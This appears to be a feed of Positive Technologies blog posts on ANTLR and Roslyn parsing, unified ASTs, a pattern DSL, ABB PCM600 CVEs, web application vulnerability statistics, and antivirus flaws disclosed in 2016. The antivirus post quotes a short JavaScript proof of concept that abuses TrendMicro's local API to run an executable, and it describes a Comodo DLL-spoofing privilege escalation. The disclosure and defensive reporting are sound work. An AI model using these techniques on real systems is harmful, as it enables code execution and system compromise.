Based on the remaining tests it can be concluded that lexing is a substantially faster stage than parsing. The exception is the PHP lexer that spent more time on lexing compared to parsing. This appears to be due to complex logic of the lexer and complex rules, but it is not influenced by case insensitive keywords, since T-SQL and PL/SQL lexers (which also contain case insensitive keywords) are much faster than parsers (up to 20 times). For example, if you use the SHARP: NEW_LINE Whitespace* '#'; instead of SHARP: '#';, the lexer will be 10 times slower instead of being 7 times faster! This is explained by the fact that any file has a lot of whitespaces, and the lexer will try to find the # symbol on each string, so its performance will be significantly slower (we were faced with such a problem, thus checking for a directive in the new string should be carried out at the stage of semantic analysis).

Error handling in ANTLR and Roslyn parsers


We wrote a simple C# file containing all parsing errors in ANTLR:
namespace App
{
©
class Program
{
static void Main(string[] args)
{
a = 3 4 5;
}
}

class B
{
c
}
ANTLR errors
  • token recognition error at: '©' at 3:5
  • mismatched input '4' expecting {'as', 'is', '[', '(', '.', ';', '+', '-', '*', '/', '%', '&', '|', '^', '<', '>', '?', '??', '++', '--', '&&', '||', '->', '==', '!=', '<=', '>=', '<<'} at 8:19
  • extraneous input '5' expecting {'as', 'is', '[', '(', '.', ';', '+', '-', '*', '/', '%', '&', '|', '^', '<', '>', '?', '??', '++', '--', '&&', '||', '->', '==', '!=', '<=', '>=', '<<'} at 8:21
  • no viable alternative at input 'c}' at 15:5
  • missing '}' at 'EOF' at 15:6
As a next step, we have tested the above-mentioned file using Roslyn compiler and discovered the following errors:
  • test(3,5): error CS1056: Unexpected character '©'
  • test(8,19): error CS1002:; expected
  • test(8,21): error CS1002:; expected
  • test(15,5): error CS1519: Invalid token '}' in class, struct, or interface member declaration
  • test(15,6): error CS1513: } expected
The number of errors detected using Roslyn was similar to that detected via ANTLR. The first and the last errors differ only in the name. The parsers have also been tested on files that are more complex. It is clear that Roslyn detects fewer errors and these errors are more relevant. However, in simple cases such as missing or extra tokens (semicolon, brackets), ANTLR detects the relevant position and the description of an error. ANTLR gives consistently worse results with errors when the part of a lexer code is written manually (compilation directives, interpolation strings). For example, if we write an #if directive without any condition, the rest part of the code may not be parsed correctly. However, in these cases, the code for recovering the process of parsing should be written manually as well (as this is a context sensitive structure).

Memory consumption of ANTLR runtime


As mentioned above, ANTLR 4 uses the internal cache obtained in the process of parsing in order to increase the performance of parsing the follow-up files. If you process too many files (we performed a test on about 70000 PHP files) or re-parse the files in the same process, memory consumption may increase significantly up to several gigabytes. You can clear the cashe by using the lexer.Interpreter.ClearDFA() interpreter method for the lexer and parser.Interpreter.ClearDFA() - for the parser after processing a certain number of files or after memory consumption has exceeded a certain threshold value.

After solving the problem of clearing cache, we have discovered an issue with multi-threaded parsers. By practical experience, we have found that the use of GetAllTokens() and ClearDFA() methods from different threads in the lexer (similar for the parser) in rare cases may lead to the "Object reference not set to an instance of an object" exception. Despite the fact that this behavior is due to an error in the ANTLR C# runtime, it can be fixed by locking with several readers (code parsers) and one writer (a cache cleaner). In the C# runtime a ReadWriterLockSlim synchronization primitive can be used to achieve such a goal.

For obvious reasons, Roslyn parser does not consume gigabytes of memory. The peak memory consumption did not exceed 200 MB, when parsing five large C# projects, aspnet-mvc-6.0.0-rc1roslyn-1.1.1corefxNewtonsoft.Json-8.0.2, and ImageProcessor-2.3.0.

Conclusion


This article has covered source code parsing with ANTLR and Roslyn. Future articles will address the following:
  • Conversion of the parse trees to a unified AST using Visitor or Walker (Listener).
  • A guide to writing an easy-to-read, efficient, and user-friendly grammar in ANTLR 4.
  • Serialization and tree structures traversing in .NET;
  • Pattern matching in a unified AST.
  • Development and use of DSL for describing patterns.

References

  • F. Yamaguchi. Modeling and Discovering Vulnerabilities with Code Property Graphs. Proceedings of the 2014 IEEE Symposium on Security and Privacy, SP, 2014.
  • Alfred V. Aho, Monica S. Lam, Ravi Sethi, and Jeffrey D. Compilers: Principles, Techniques, and Tools. Pearson Education Inc, Sep. 2006.
  • Terence Parr. The Definitive ANTLR Reference. Pragmatic Bookshelf, 2013.
  • Terence Parr, Sam Harwell, Kathleen Fisher. Adaptive LL(*) Parsing: The Power of Dynamic Analysis. ACM New York, 2014.
  • Roslyn. https://github.com/dotnet/roslyn
  • ANTLR grammars. https://github.com/antlr/grammars-v4
  • ANTLR. https://github.com/antlr/antlr4

Author: Ivan Kochurkin, Positive Technologies

Antivirus As a Threat

$
0
0

Many people do not consider antivirus tools to be a threat. Antivirus software is frequently considered a trusted application; it may cause the reduction of information system efficiency, but provides protection against different types of attacks. As a result, antivirus can be the sole protection tool for the end-user while a set of antivirus software becomes the principal security method for enterprises.

However, as with any complicated programs, antiviruses are inherently vulnerable. Antivirus processes are trusted and run in privileged mode with extensive access rights and that makes antiviruses appealing for attackers, as their exploitation can lead to system compromise.
Currently, more attention is paid to vulnerabilities of protection software and antiviruses in particular. The swelling numbers of exploits found and published in exploit-db and other resources indicate that this is a growing problem.

The chart above demonstrates the number of vulnerabilities found yearly in well-known antivirus software for the last 15 years. In the 2000s, information about antivirus vulnerabilities was published rarely, but in 2015, more than 50 exploits based on such critical vulnerabilities in antiviruses as authentication bypass, privilege escalation, and remote code execution were published.

In particular, 2015 saw new vulnerabilities discovered in such products as ESET, Avast, Bitdefender, Symantec, Kaspersky Lab, FireEye, and Malwarebytes.

In addition to independent researchers, Google Project Zero started searching vulnerabilities in protection tools in 2014 and detected a significant percentage of vulnerabilities published in 2015. It is quite logical that governmental organizations also pay attention to this issue. Previously we covered reviews of Russian antivirus software performed by foreign intelligence agencies.
It is hard to forecast the frequency of vulnerabilities in antivirus software, but it is possible to make some conclusions based on exploits published in the first quarter of 2016. More details about these exploits are given below.

Attacks on Vulnerable Antiviruses

TrendMicro
Tavis Ormandy, a researcher from the Google Security Research team, found a critical vulnerability in TrendMicro antivirus that leads to remote code execution on January 11, 2016.

When using autoloading of the antivirus, Password Manager is implemented by default. This module is written in JavaScript with node.js. It initiates RPC to handle API requests via HTTP. The vulnerability was found in openUrlInDefaultBrowser, an API function that calls ShellExecute() without checking transferred arguments. In other words, it allows arbitrary code execution.

x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/
openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};

The patch was issued one week after the incident.


McAfee Application Control
On January 12, specialists from SEC Consult, an Austrian company, published a report on bypassing security on McAfee Application Control. This application rejects the launching of apps unavailable in the white list and protects critical infrastructure. They used version 6.1.3.353 on Windows for testing. The researchers determined how to execute arbitrary code, launch unauthorized applications, and bypass DEP and UAC features and white lists. Additionally, the researchers detected vulnerabilities in swin1.sys, which may lead to system failure.


QuickHeal
On February 19, the researcher Fitzl Csaba wrote a proof-of-concept exploiting a vulnerability in the popular Indian antivirus QuickHeal 16.00. The webssx.sys driver appeared to be vulnerable to CVE-2015-8285 that can trigger BSOD or escalation of privileges. The driver was created without the flag FILE\_DEVICE\_SECURE\_OPEN, so any user can interact with it, bypassing ACL. The researcher determined the IOCTL code and necessary buffer size for calling the vulnerable function. Due to insufficient checks of data received from the input buffer, an integer overflow of arguments sent to the memcpy function occurred.


Comodo
On February 29, Greg Linares detected a vulnerability in the GeekBuddy module of Comodo antivirus. It leads to local escalation of privileges. GeekBuddy starts several processes, one of which tries to upload the library shfolder.dll. Instead of a full path to a file, GeekBuddy implies only a hard-coded library name, and it is possible to spoof dll. If a hacker inserts malicious shfolder.dll into C:\ProgramData\Comodo\lps4\temp\ and launches a client’s update or waits for an automatic update, they can escalate privileges up to the SYSTEM level and fully compromise the system.


Avast
On March 4, Google Security Research published new vulnerabilities in Avast. This time, they discovered an error related to memory corruption when parsing digital certificates. Tavis Ormandy created a portable executable file that triggered Avast failure. According to the specialist, the error was caused by corruption of memory when parsing digital signatures in files.


McAfee VirusScan
On March 7, Maurizio Agazzini presented another McAfee vulnerability. The researcher wrote an exploit that allows bypassing security restrictions of McAfee VirusScan Enterprise 8.8. By using this vulnerability, a user with rights of a local administrator can bypass security restrictions and disable the antivirus without using its password.

The vulnerability was fixed on February 25, though he started sending his requests in fall 2014.


Avira
On March 16, a critical vulnerability in the Avira antivirus was detected. As expected, the antivirus processes portable executable files, however, while testing the antivirus, researchers found the vulnerability called “heap underflow”. It occurred when PE section headers were parsed. If a header had a large RVA, Avira saved the calculated offset on the heap and recorded data controlled by attackers in the buffer (data from section ->PointerToRawData). The vulnerability caused RCE with the NT\_AUTHORITY\SYSTEM privileges. The patch was issued on March 18.


More Comodo
On March 19, a report on a critical vulnerability in the Comodo antivirus was published. This product contains an x86 emulator used to unpack and monitor obfuscated executable files automatically. The emulator is supposed to execute malicious code securely within a short time, so it allows the sample to unpack or demonstrate some behavior feature interesting for detection.

With the exception of issues related to the memory corruption, arguments of some dangerous emulated API requests are transferred to API functions during scanning. Some wrappers extract arguments from the emulated address space and send them directly to the system calls with the NT\_AUTHORITY\SYSTEM privileges. The call results then return to the emulator causing code execution.

It allows for different types of attacks, for example, reading, deleting, listing, and using cryptographic keys, interacting with smart cards and others devices. It is possible because the emulator forwards the arguments of the CryptoAPI functions directly to real APIs. Moreover, the vulnerability made it possible to read registry keys by using the RegQueryValueE wrapper, whose arguments are sent directly to a real API.

The attack vector shows that an attacker can execute malicious code in the emulator just by sending an email or making a victim visit an infected website. The patch was issued on March 22.


On March 14, researchers detected a critical vulnerability in the Comodo antivirus engine. It was possible to execute arbitrary code when the antivirus unpacked malicious files protected by PackMan. PackMan is a little-known open source packer used by Comodo during scanning.

During the processing of files compressed with certain options by the packer, compression parameters are read directly from the input file without validation. Fuzzing shows that the pointer pksDeCodeBuffer.ptr can be forwarded anywhere in the function CAEPACKManUnpack::DoUnpack\_With\_NormalPack, and that allows an attacker to free the arbitrary address by the free() function. The vulnerability allows a hacker to execute code with the NT\_AUTHORITY\SYSTEM privileges. The patch was issued on March 22.


What to Do
Despite all of the above outlined vulnerabilities, we cannot completely abandon the use of antivirus software. Antivirus engines analyze huge amounts of files more quickly than alternative solutions such as a sandbox, because they widely implement statistical analysis.

An effective protection system based on antiviruses should demonstrate detection accuracy and risk minimization. Here are the most promising ways to tackle this issue.

  • Scanning performed by several antivirus engines significantly increases accuracy and speed of threat detection. Some online services like VirusTotal can rise to the challenge but require uploading your files, which could lead to info leakage to third parties. It makes sense to perform such scans on a local server, which eliminates any involvement of outsider applications.
  • Security risks may be mitigated if all suspicious files are examined in an isolated and secure environment. We should understand that modern malicious software is able to analyze a target environment and either bypass sandboxes or stay hidden. That is why it is recommended to employ honeypots as they mimic the real system making it easy to observe malicious behavior for a prolonged period of time without being noticed.
  • Even after malware is detected, an antivirus is not able to trace back all the objects that were affected by it. This means that a security system should support forensic analysis functionality.

We employ this and other technologies in PT MultiScanner.

A Positive Technologies Expert Helped to Protect ABB Digital Substations from Cyberattacks

$
0
0

Image credit: ABB    

 ABB, a Switzerland-based company that produces software for control systems in the energy industry, has acknowledged that its PCM600 suffers from four vulnerabilities related to insecure password storage. The one who detected and reported them to the vendor was Ilya Karpov, an ICS security expert from Positive Technologies.

As noted in the ICS-CERT advisory, the ABB engineer software for industrial automation management (protective relay, IED) is deployed in electric power substations around the world. PCM600s up to and including version 2.6 suffer from the vulnerabilities found by Ilya Karpov. Exploiting these flaws allows a low-skilled attacker or malicious software access a local machine that has ABB's PCM600 installed, reconfigure a project or obtain critical information to leverage read and write access via OPC.

All four PCM600 vulnerabilities are related to sensitive data storage and processing:

  • CVE-2016-4511 — Weak hashing algorithms for project password storage
  • CVE-2016-4516 — Passwords are stored in plain text, if a user doesn’t readdress the dialog box for changing a project password via the configuration menu
  • CVE-2016-4524 — OPC server passwords are stored in plain text 
  • CVE-2016-4527 — Insecure transfer and storage of sensitive data in the database

ABB has already issued a hot fix for version 2.6 and released version 2.7 that resolves all reported vulnerabilities. The company recommends that customers apply the update at earliest convenience.
Other measures include:
Restricting physical access to objects for unauthorized persons
Forbidding ICS direct Internet connection
Forbidding usage of online services (email, messengers) at user workstations
Connecting to other networks exclusively via firewalls with a limited amount of open ports
Antivirus scanning of all portable computers and storage devices prior to connection to control systems
You may find the details on maintaining PCM600 security in the vendor’s manual.

It is worth mentioning that the ABB control systems are popular in Russia. According the Positive Technologies ICS security research, ABB product specialists in Russia hold the third place in the segment of programmable logic controllers.


Tree structures processing and unified AST

$
0
0
The previous article in this series discussed the theory of source code parsing in ANTLR and Roslyn. The article pointed out that a signature-based code analysis in PT Application Inspector is divided into the following stages:
1.        Parsing into a language dependent representation (abstract syntax tree, AST).
2.        Converting AST to a language independent unified format (unified AST, UAST).
3.        A direct comparison with patterns described in the DSL.
The current article focuses on the second stage that includes AST processing using Visitor and Listener strategies, converting AST to a unified format, simplifying an AST, and the algorithm for matching tree structures.

Contents

          AST Traversing
         Visitor and Listener
         Grammar and Visitor in ANTLR
          Types of nodes in a unified AST
          Testing of converters
          Simplifying an UAST
          Conclusion

AST Traversing

As is known, a parser converts the source code into an AST, a parse tree with redundant tokens removed. There are several different ways of processing such a tree. Probably the easiest one implies a recursive in-depth traversal of descendants. However, this approach can only work for rather simple cases, when the number of node types is small and the processing logic is plain to understand. In other cases, we need to split the processing logic into separate methods. To achieve this goal, we use two standard mechanisms (design patterns): Visitor and Listener.

Visitor and Listener

In the Visitor processing of the node descendants requires invoking their traversal methods manually. If the parent has three child nodes and we call methods only for two of them, a part of the subtree will not be processed. In the Listener (Walker) interface processing methods for node descendants are called automatically. The Listener interface contains enterNode() and exitNode() methods, which are invoked when entering and exiting a given node. Using an event mechanism allows implementation of these methods. Unlike methods in the Listener interface, Visitor methods may return objects and may even be typed. For instance, when we declare CSharpSyntaxVisitor, each Visit method returns an AstNode object, a common ancestor of all other nodes in a unified AST.
Thus, using Visitor’s design pattern to convert the tree provides you with dynamic and concise code because there is no need to store information about the visited nodes. The figure below shows that unnecessary HTML and CSS nodes are truncated while converting the PHP language. The order of traversal is indicated by numbers. Listener is usually used to aggregate data (e.g. from CSV files) and to convert one code to another (JSON -> XML). For more information, refer to The Definitive ANTLR 4 Reference.

Differences between Visitor in ANTLR and Roslyn

Visitor and Listener implementations may differ in libraries. The table below provides details about Visitor/Listener classes and methods in Roslyn and ANTLR.

ANTLR
Roslyn
Visitor
AbstractParseTreeVisitor< Result >
CSharpSyntaxVisitor< Result >
Listener
IParseTreeListener
CSharpSyntaxWalker
Default
DefaultResult
DefaultVisit(SyntaxNode node)
Visit
Visit(IParseTree tree)
Visit(SyntaxNode node)
Both Roslyn and ANTLR have the methods returning the default result (if the Visitor method is not overridden for some syntactic structure), and the Visit method that determines which special Visitor method should be called.
ANTLR generates a Visitor for every syntactic grammar rule. There are also special types of methods listed below:
          VisitChild(IRuleNode node); is used to implement the default node traversal.
          VisitTerminal(IRuleNode node); is used when traversing the terminal nodes, i.e. tokens.
          VisitErrorNode(IErrorNode node); is used when traversing the tokens obtained from parsing the code with lexical or syntax errors. For example, if a statement is missing a semicolon at the end, the parser will insert such a token and report it as an error. For more information about parsing errors, see the previous article.
          AggregateResult(AstNode aggregate, AstNode nextResult); a rarely used method intended for aggregating results derived from the traversal of descendants.
          ShouldVisitNextChild(IRuleNode node, AstNode currentResult); a rarely used method intended for determining whether it is necessary to process the next node descendant depending on the result of the currentNode traversal.
Visitor pattern for Roslyn has specific methods for each syntactic structure and a generalized Visit method that will work for all nodes. Unlike ANTLR, it is missing methods to perform traversal of “intermediate” structures. For example, Roslyn does not imply any method for VisitStatement statements, there are only some specific methods like VisitDoStatementVisitExpressionStatement,VisitForStatement, etc. The generalized Visit method can be used as a VisitStatement method. Another difference is that the traversal methods for SyntaxTrivia nodes (i.e. nodes, which can be easily removed without losing code information, like a space, or a comment) are called along with the traversal methods for the main nodes and tokens.
The drawback of using ANTLR visitors is that the names of the generated Visitor methods are directly dependent on the style of grammar rules, so they may fail to fit in with the overall code style. For example, SQL grammars use the so-called Snake case, in which the words are separated with underscore characters. Roslyn methods are written in the style of C# code. Despite the differences, processing techniques for tree structures in Roslyn and ANTLR become more and more unified with each new version (ANTLR version 3 and earlier had no support for Visitor and Listener mechanisms).

Grammar and Visitor in ANTLR

In ANTLR, the
ifStatement
    : If parenthesis statement elseIfStatement* elseStatement?
    | If parenthesis ':' innerStatementList elseIfColonStatement* elseColonStatement? EndIf ';'
    ; rule
will generate a VisitIfStatement(PHPParser.IfStatementContext context) method, wherein the context will have the following fields:
          parenthesis – a single node.
          elseIfStatement* – a node array. If the syntax is missing, then the array length is null.
          elseStatement? – an optional node. If the syntax is missing, then the optional node is null.
          IfEndIf – terminal nodes, start with a capital letter.
          ':'';' – unnamed terminal nodes, are not contained in the context (available only through GetChild ()).
It is worth noting that the fewer rules involved in the grammar, the easier and faster the Visitor can be written. However, the repeating syntax also needs to be brought out to separate rules.

Alternative and element labels in ANTLR

Quite often we have a situation when a rule has other alternatives, and it would be logical to handle these alternatives in the individual methods. Luckily, ANTLR 4 has the alternative labels that begin with an # character and are added after each rule alternative. When generating a parser code, a separate Visitor method is generated for each label, which allows to avoid having a huge amount of code in case if the rule has lots of alternatives. All the alternatives should be marked or none of them. We can use the rule element labels to name the terminal denoting a set of values:
expression
    : op=('+'|'-'|'++'|'--') expression                   #UnaryOperatorExpression
    | expression op=('*'|'/'|'%') expression              #MultiplyExpression
    | expression op=('+'|'-') expression                  #AdditionExpression
    | expression op='&&' expression                       #LogicalAndExpression
    | expression op='?' expression op2=':' expression     #TernaryOperatorExpression
    ;
ANTLR generates VisitExpressionVisitUnaryOperatorExpressionVisitMultiplyExpression, and some other visitors for this rule. Each Visitor will contain an expression array consisting of 1 or 2 elements and an op literal. Labels will keep the code clear and concise:
public override AstNode VisitUnaryOperatorExpression(TestParser.UnaryOperatorExpressionContext context)
{
    var op = new MyUnaryOperator(context.op().GetText());
    var expr = (Expression)VisitExpression(context.expression(0));
    return new MyUnaryExpression(op, expr);
}
public override AstNode VisitMultiplyExpression(TestParser.MultiplyExpressionContext context)
{
    var left = (Expression)VisitExpression(context.expression(0));
    var op = new MyBinaryOpeartor(context.op().GetText());
    var right = (Expression)VisitExpression(context.expression(1));
    return new MyBinaryExpression(left, op, right);
}
public override AstNode VisitTernaryOperatorExpression(TestParser.TernaryOperatorExpressionContextcontext)
{
    var first = (Expression)VisitExpression(context.expression(0));
    var second = (Expression)VisitExpression(context.expression(1));
    var third = (Expression)VisitExpression(context.expression(2));
    return new MyTernaryExpression(first, second, third);
}
...
Without using alternative labels, the processing of Expression is in the same method and the code is as follows:
public override AstNode VisitExpression(TestParser.ExpressionContext context)
{
    Expression expr, expr2, expr3;
    if (context.ChildCount == 2) // Unary
    {
        var op = new MyUnaryOperator(context.GetChild(0).GetText());
        expr = (Expression)VisitExpression(context.expression(0));
        return new MyUnaryExpression(op, expr);
    }
    else if (context.ChildCount == 3) // Binary
    {
        expr = (Expression)VisitExpression(context.expression(0));
        var binaryOp = new MyBinaryOpeartor(context.GetChild(0).GetText());
        expr2 = (Expression)VisitExpression(context.expression(1));
        return new MyBinaryExpression(expr, binaryOp, expr2);
        ...
    }
    else // Ternary
    {
        var first = (Expression)VisitExpression(context.expression(0));
        var second = (Expression)VisitExpression(context.expression(1));
        var third = (Expression)VisitExpression(context.expression(2));
        return new MyTernaryExpression(first, second, third);
    }
}
Alternative labels exist not only in ANTLR, but also in other tools for describing grammars. For example, unlike with ANTLR, an assignment operator label in Nitra is located to the left of the alternative:
syntax Expression
    {
      | IntegerLiteral
      | BooleanLiteral
      | NullLiteral            = "null";
      | Parenthesized          = "(" Expression ")";
      | Cast1                  = "(" !Expression AnyType ")" Expression;
      | ThisAccess             = "this";
      | BaseAccessMember       = "base" "." QualifiedName;
      | RegularStringLiteral;

Types of nodes in a unified AST

The development of the structure for a unified AST was guided by the structure of the NRefactory AST. We find this structure quite simple, at the same time, fidelity (a tree converted to code character by character) is not required. Every node is inherited from the AstNode and has its own type (NodeType), which is used at the stage of matching with patterns and deserialization from JSON. The structure of nodes looked like this:
In addition to the type, each node has a property that stores the location in the code (TextSpan), which is used to display it in the source code when comparing with the pattern. A nonterminal node keeps a list of child nodes, and terminal - a numeric, string or other primitive value.
In order to compare AST nodes of different languages we created a table, where each line represents the syntax of certain nodes and each column is their implementation in C#, Java, and PHP languages. The table looked as follows:



The explanation to the terms given in this table:
          Expression; the expression has a return value.
          Statement; the statement (instruction), has no return value.
          Literal; a terminal node.
          Most Common Ast (MCA) This node is built if all three languages contain a node of this or similar type (e.g. IfStatement, AssignmentExpression).
          Most Detail Ast (MDA) This node is built if at least one language contains a node of this type (e.g. FixedStatenemt fixed (a) { } for C#). These nodes are more relevant to SQL like languages due to the fact they are classified as declarative, and the difference between T-SQL and C# is much more significant than between PHP and C#.
In addition to the nodes seen in the figure (and pattern nodes described in the next section) there are also artificial nodes required to build the Most Common Ast node with as little loss in syntax as possible. The examples of such nodes are:
          MultichildExpression is inherited from the Expression, but it contains a collection of other Expression type nodes;
          WrapperExpression is inherited from the Expression, but it contains an arbitrary type node;
          WrapperStatement is inherited from the Statement, but contains an arbitrary type node.
Expression and Statement are basic constructs in imperative programming languages. First ones have a return value, while the second are used to execute operations. Therefore in this module we have focused mostly on them. These constructs are the basic building blocks of both the CFG implementation and other source code representations required for taint analysis. The detection of vulnerabilities in the source code requires no knowledge about the syntactic sugar, generics or other things specific to a particular language. Thus we can rewrite the syntactic sugar to basic constructs and remove some specific details.
Artificial nodes representing user templates are called pattern nodes. For example, a range of numbers and regular expressions are used as literal patterns.

Testing of converters

Testing of the entire code (instead of its parts) is a task of high priority for the code analyzer. To accomplish this, we decided to override Visitor methods for all the node types. Thus if vizitor is not used, it generates an exception new ShouldNotBeVisitedException(context). This approach simplifies the development, because the IntelliSense knows which methods were overridden, and which were not. Therefore, it helps to identify which Visitor methods have already been implemented.
We also have some suggestions on improving the code coverage analysis. Each node of the unified AST keeps the location of the corresponding source code. At the same time all the terminals are associated with lexemes, i.e. certain sequences of characters. Since all the lexemes should be processed, the coverage ratio can be expressed in the following form where uterms — terminals of the unified AST, and terms — terminals of the typical AST in Roslyn or ANTLR:
This metric represents code coverage using a single coefficient that should tend to unity. The evaluation through this coefficient is approximate, however it could be used to refactor and improve the Visitor's code. We can use graphical representation of the covered terminals to obtain a more reliable analysis.

Simplifying an UAST

After converting an AST to UAST the latter should be simplified. The simplest and most effective optimization method is a constant folding. For example, there are some code vulnerabilities related to setting the excessively long lifetime of the cookie: cookie.setMaxAge(2147483647); the argument in brackets can be both written as a single number, e.g. 86400, and some arithmetic expression, 60 * 60 * 24. Another example is related to string concatenation when searching SQL-injection and other vulnerabilities.
To achieve this goal Visitor for the UAST was implemented. Since simplification of an AST reduces the number of nodes in the tree, the Visitor is typed: it accepts and returns the same type. The reflection feature in .NET allows the implementation of such a Visitor with small code size. Since each node contains other nodes or terminal primitive values, then using reflection enables to extract all possible members of the particular node and to process them, calling other visitors in a recursive scenario.

Algorithm for matching AST and patterns

The algorithm is trying to match the pattern introduced as a tree structure with a tree fragment rooted at the current node. First, the node type is compared and then the following operations are performed depending on its type:
          Recursive comparison of descendants.
          Comparison of simple literal types (identifier, strings, and numbers).
          Comparison of extended literal types (regular expressions, ranges). Comments are included in this type.
          Comparison of complex extended types (expressions, the Statement sequence).
This approach is based on simple principles to achieve high performance with a relatively small amount of code for their implementation. The latter is achieved due to the fact that the CompareTo method to compare nodes is implemented for the base class, terminals, and a small number of other nodes. It is not yet required to implement more sophisticated finite-state machine algorithms improving the performance. However, it is difficult (or even impossible) to use this algorithm for more advanced analysis, e.g., the one sensitive to semantics and covering links between different AST nodes.

Conclusion

In this article we went over Visitor and Listener patterns used to process trees. We also talked about the structure for a unified AST. Next time we will tell you about:
          Methods for storing code patterns (Hardcoded, Json, DSL).
          Developing and using the DSL to describe patterns.
          Examples of some actual patterns and principles of searching them in open source projects.


Author: Ivan Kochurkin, Positive Technologies

Web Application Vulnerabilities-2016: Users Unprotected

$
0
0


Modern web technologies allow businesses to solve organizational issues cost-effectively and efficiently and demonstrate their services and products to a wide range of audiences through the Internet. However, attackers may exploit websites as an easy access point to company infrastructure. This can cause financial and reputational damage, and despite well documented incidents involving compromised security, developers and administrators still pay little attention to the security of web applications.

Positive Technologies experts examine around 300 web applications each year using various techniques from instrument to source-code analysis. This report provides a summary of statistics and findings gathered during penetration testing of web applications in 2015. It also compares 2015 results to those in 2013 and 2014 and tracks the dynamics of web application development in the context of delivering information security.


Cases and Methodology

We chose 30 applications, from the total number examined in 2015, and conducted an in-depth analysis on each of these. The study contains vulnerabilities tested in the testbeds. The vulnerability assessment was conducted via black-, gray- and white-box testing manually (with the aid of automated tools) or using automated code analyzer. The black-box technique is defined as website security testing from the perspective of an external attacker, with no “inside” knowledge of the system. The gray-box testing is similar to the black-box testing, except an attacker is defined as a user who has some privileges in the system. The white-box scanning presupposes the use of all relevant information about the application, including its source code.

Our statistics only include code and configuration vulnerabilities. Vulnerabilities were categorized according to WASC TC v. 2, with the exception of Improper Input Handling and Improper Output Handling, since these threats are implemented by exploiting a number of other vulnerabilities. The severity of vulnerabilities was estimated in accordance with CVSS v. 2.

These applications belong to companies from different industries — telecoms (23%), manufacturing (20%), mass media (17%), IT (17%), finance (13%), and governmental organizations (10%).

Most of the examined web applications were written in Java (43%), followed by PHP (30%). Applications based on other languages and technologies, such as ASP.NET, Perl, ABAP, and 1С, were also used. The most common server was Nginx (34%), followed by Microsoft IIS (19%), Apache Tomcat (14%), WebLogic (14%), Apache, and SAP NetWeaver Application Server. Almost half of the resources studied were production systems, available on the Internet, but there were some test platforms still in development or acceptance when tested.

All Sites are Vulnerable

All applications contained at least medium-severity vulnerabilities. 70% of the systems studied had a critical vulnerability, and the percentage of systems with this type of vulnerability has grown consistently over the last three years.

Most of the applications examined allow attacking users. 80% of the investigated resources were vulnerable to Cross-Site Scripting (XSS) attacks. Successful exploitation of this vulnerability could allow an attacker to inject arbitrary HTML tags, including JavaScript, into a browser, obtain a session ID or conduct phishing attacks.

The second most common flaw was Information Leakage: about 50% of applications were vulnerable. 47% of the websites were exposed to brute force attacks, and XML External Entities was among the most common high-severity vulnerabilities discovered in 2015. This security weakness allows attackers to obtain the content of server files or execute requests in the local network of the attacked server.


Most common vulnerabilities (%)

Development Tools: Java Better than PHP? 

Previous studies show that PHP systems were more vulnerable than applications written in ASP.NET and Java. By contrast, in 2015, 69% of Java applications suffered from vulnerabilities, while PHP systems were less vulnerable, 56% in 2015 compared to 76% in 2013.


Systems with vulnerabilities of various severity levels (by development tools)

An average PHP application contains 9.1 critical vulnerabilities, a Java application contains 10.5, while applications based on other languages and development tools have only 2 vulnerabilities per application on average.

XXS had the largest percentage of vulnerabilities among all types of programming languages. The percentage of SQL Injection found in PHP applications in 2015 decreased from 67% to 22%.


Most common vulnerabilities (by development tools)

Vulnerable Servers on Microsoft IIS

The percentage of applications run on Microsoft IIS with high-severity vulnerabilities increased in 2015. By contrast, vulnerabilities in Nginx and Apache Tomcat sites decreased from 86% to 57% and from 60% to 33% respectively.


Web applications with high-severity vulnerabilities (by web servers)

The most common administrative error was Information Leakage, and this weakness was detected in all applications based on Microsoft IIS. The second most common flaw was insufficient brute force protection.

Banks and IT: Industry Concerns

All banking and IT websites contained critical vulnerabilities, results similar to 2014. There was improvement only in the manufacturing industry and telecom applications.


Sites with high-severity vulnerabilities by industries

Almost Equally Vulnerable Production and Test Sites

The percentage of vulnerable applications already put into production is extremely high: more than a half (63%) contained critical vulnerabilities. These vulnerabilities allow an attacker to obtain full control of the system (in case of arbitrary file upload or command execution) or sensitive information as a result of SQL Injection, XXE, etc. An intruder also can conduct a DoS attack.


Vulnerabilities detected for test and production systems

Source Code Analysis Detects More Vulnerabilities

Source code analysis uncovers more high-severity vulnerabilities than the black-box technique, however, even black- and gray-box testing discovered a high percentage of critical flaws (59%). Even if an intruder does not have access to source code, web applications are not necessarily secure.



Systems with vulnerabilities of various severity levels (by testing methods)

The average number of different severity vulnerabilities detected by the white-box testing is higher than the results that came from black- and gray-box testing.



Average number of vulnerabilities per system 

The study is comprised of a comparison between manual and automated (using automated scanners) white-box testing. The code analyzer discovered on average 15 critical vulnerabilities per system, while manual testing detected only 4 vulnerabilities.



Average number of specified severity vulnerabilities per system

Thus, the white-box testing is more efficient than other methods without source code analysis. Automated code analysis is effective when investigating code volumes of applications with numerous libraries.

The 2015 results demonstrate how important it is to regularly analyze web application security. It is important to analyze security at all development stages and regularly (e.g. twice a year) in the course of operational use: more than a half (63%) of applications put into production contain critical vulnerabilities. This can lead to sensitive data disclosure, system compromise or failure. It is important to use application firewalls to protect against attacks on web applications.

You can find the full version of the report at www.ptsecurity.com/library/whitepapers/

Pattern language for a universal signature-based code analyzer

$
0
0
The process of signature-based code analysis in PT Application Inspector is divided into the following stages:
  1. Parsing into a language dependent representation (abstract syntax tree, AST).
  2. Converting an AST to a language (agnostic) unified format.
  3. A direct comparison with patterns described in the DSL.

The present article focuses on the third stage, namely: ways of describing patterns, development of a custom DSL language, which allows to describe patterns, and patterns written in this language.

Ways of describing patterns

  • Hardcoded patterns
  • JSON, XML or some other markup language
  • DSL, domain-specific language

Hardcoded patterns

Patterns can be manually written directly inside the code. There is no need to develop a parser. This approach is not suitable for non-developers, though it can be used for writing unit tests. Addition of new patterns requires recompilation of the whole program.

JSON, XML or some other markup language

Parts of the compared AST can be stored and retrieved directly from JSON or other data formats. This approach allows to load patterns from an external source; however, syntax will be bulky and unsuitable for editing by the user. Still, this method can be used for serialization of tree structures. (The next article in the series will present methods for serialization and bypassing of tree structures in .NET).

Custom language for pattern description, DSL

The third approach is the development of a special domain-specific language that will be easily editable, concise, but still having sufficient expressive power to describe existing and future patterns. A limitation to this approach is the need to develop the syntax and parser.

Practicability

As mentioned in the first article, we can not simply describe all the patterns using regular expressions. The DSL is a mix of regular expressions and frequently used structures of programming languages. In addition, this language is designed for some particular domain knowledge and it is not expected to be used as some kind of a standard.

